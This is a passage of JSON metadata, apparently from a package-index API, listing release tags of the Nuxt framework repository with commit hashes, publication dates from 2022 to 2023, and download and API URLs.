2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt